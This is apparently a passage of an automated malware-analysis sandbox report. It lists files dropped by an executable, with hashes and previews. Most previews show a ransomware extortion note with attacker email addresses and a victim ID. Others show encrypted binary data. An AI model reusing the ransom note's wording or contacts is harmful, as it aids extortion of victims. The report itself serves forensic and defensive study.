                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1226
                                                                                                    Entropy (8bit):7.813586503416373
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gaCE+jM+MYn+t36nSICSHNNUO3nMxIQlJe3az4mH:UE+Y+MMKKnSxyUMADJfP
                                                                                                    MD5:FED38B64B23C606DCAB950724915ACF8
                                                                                                    SHA1:C397C4CE4B9E273CE3537E017070523AA4DD47A8
                                                                                                    SHA-256:623F5E70776F97266BB5711E7A86C0BF61C35DB4DD55DBD930824E67969FB156
                                                                                                    SHA-512:654EE60913BA3351610B1482DD2A932C53EAFE628F73897841FDC3D24519F9E2B3C561B7776FA52F061BA028B5672CD1DFDD8E5DE2404FBB26E5E0A2D6956D3F
                                                                                                    Malicious:false
                                                                                                    Preview:=I.....T2.i.a.........../. ..&..t......-..=..k2.W..O[.$/.L......E.)...q......U.[......;...0./A....n.j>!...?:.....q....L....F./..z.a.Z... ..T(\L.;.@.P7.0.^...{.6...N....e...;i...'dJ.....~y^..g...3B....(2...Q....":.N.\.pb.1..3ywF.c..$.K.g.).N.t.6..'....)....jA...,$S......@...#1.V..L./n.OZ.ZfX.......8......}.....s.mIG.K.o....9l.Xut:...k.n..s.....^.....(Q...@.l..O....n.z6`#....V.:kM..&&..$...|t....=AoZ.A$......sV....].....>*$......A..7.um<Q.. ..9|.o.i...C.F...)..8H...d..C`......;bu..+....u...?Oq<+..wrq....l`....f.nmPUq...9;...#.....s.H.<......:..?BU+zs....{..p...l.x.8W.@,.........M...C.I@..}yd...]..*.....d|.<...9....(...v..../..J.m.q.+.].2...j..3.5..!.o......DmA<.$.e*..7.`..{'.Tql.F..........F.v.p.Ww.....jh.L..A..S.W..L........R5.....s..8n..k....f.....\.....w........&..$....,.M.<e.r.X....79.X.|7......M....X.H..>1"#9.......M..;R..~..l5<?..4.....;.^...)..gF*...0....(Al8.3.*.......f.Z....V........OG.s....~.1..*...2YO2.. r.*..>F$.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1226
                                                                                                    Entropy (8bit):7.813586503416373
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gaCE+jM+MYn+t36nSICSHNNUO3nMxIQlJe3az4mH:UE+Y+MMKKnSxyUMADJfP
                                                                                                    MD5:FED38B64B23C606DCAB950724915ACF8
                                                                                                    SHA1:C397C4CE4B9E273CE3537E017070523AA4DD47A8
                                                                                                    SHA-256:623F5E70776F97266BB5711E7A86C0BF61C35DB4DD55DBD930824E67969FB156
                                                                                                    SHA-512:654EE60913BA3351610B1482DD2A932C53EAFE628F73897841FDC3D24519F9E2B3C561B7776FA52F061BA028B5672CD1DFDD8E5DE2404FBB26E5E0A2D6956D3F
                                                                                                    Malicious:false
                                                                                                    Preview:=I.....T2.i.a.........../. ..&..t......-..=..k2.W..O[.$/.L......E.)...q......U.[......;...0./A....n.j>!...?:.....q....L....F./..z.a.Z... ..T(\L.;.@.P7.0.^...{.6...N....e...;i...'dJ.....~y^..g...3B....(2...Q....":.N.\.pb.1..3ywF.c..$.K.g.).N.t.6..'....)....jA...,$S......@...#1.V..L./n.OZ.ZfX.......8......}.....s.mIG.K.o....9l.Xut:...k.n..s.....^.....(Q...@.l..O....n.z6`#....V.:kM..&&..$...|t....=AoZ.A$......sV....].....>*$......A..7.um<Q.. ..9|.o.i...C.F...)..8H...d..C`......;bu..+....u...?Oq<+..wrq....l`....f.nmPUq...9;...#.....s.H.<......:..?BU+zs....{..p...l.x.8W.@,.........M...C.I@..}yd...]..*.....d|.<...9....(...v..../..J.m.q.+.].2...j..3.5..!.o......DmA<.$.e*..7.`..{'.Tql.F..........F.v.p.Ww.....jh.L..A..S.W..L........R5.....s..8n..k....f.....\.....w........&..$....,.M.<e.r.X....79.X.|7......M....X.H..>1"#9.......M..;R..~..l5<?..4.....;.^...)..gF*...0....(Al8.3.*.......f.Z....V........OG.s....~.1..*...2YO2.. r.*..>F$.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
